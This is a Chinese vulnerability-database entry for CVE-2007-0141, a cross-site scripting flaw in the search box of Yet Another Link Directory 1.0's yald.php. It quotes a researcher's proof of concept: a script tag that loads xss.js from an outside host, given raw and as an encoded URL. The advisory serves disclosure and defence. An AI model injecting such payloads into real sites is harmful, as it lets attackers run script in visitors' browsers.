Yet Another Link Directory 'Yald.PHP' 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192208 漏洞类型 跨站脚本
发布时间 2007-01-09 更新时间 2007-01-10
CVE编号 CVE-2007-0141 CNNVD-ID CNNVD-200701-075
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2007010037
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-075
|漏洞详情
YetAnotherLinkDirectory1.0版本的yald.php中存在跨站脚本攻击漏洞。远程攻击者可以借助搜索参数,注入任意的web脚本或HTML。
|漏洞EXP
Yet Another Link Directory v1.0
http://yald.sourceforge.net/

Effected files:
yald.php

---------------------------
yald.php search box XSS

User input isn't sanatized before being generated. In the search box for a PoC put:
<script src=http://www.youfucktard.com/xss.js></script>

url:
http://example.com/yald.php?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufuckt
ard.com%2Fxss.js%3E%3C%2FSCRIPT%3E

- Luny
|参考资料

来源:BID
名称:21904
链接:http://www.securityfocus.com/bid/21904
来源:BUGTRAQ
名称:20070106YetAnotherLinkDirectoryv1.0
链接:http://www.securityfocus.com/archive/1/archive/1/456122/100/0/threaded
来源:VUPEN
名称:ADV-2007-0082
链接:http://www.frsirt.com/english/advisories/2007/0082
来源:SECUNIA
名称:23646
链接:http://secunia.com/advisories/23646
来源:OSVDB
名称:31626
链接:http://osvdb.org/31626
来源:XF
名称:yald-yald-xss(31322)
链接:http://xforce.iss.net/xforce/xfdb/31322
来源:SREASON
名称:2121
链接:http://securityreason.com/securityalert/2121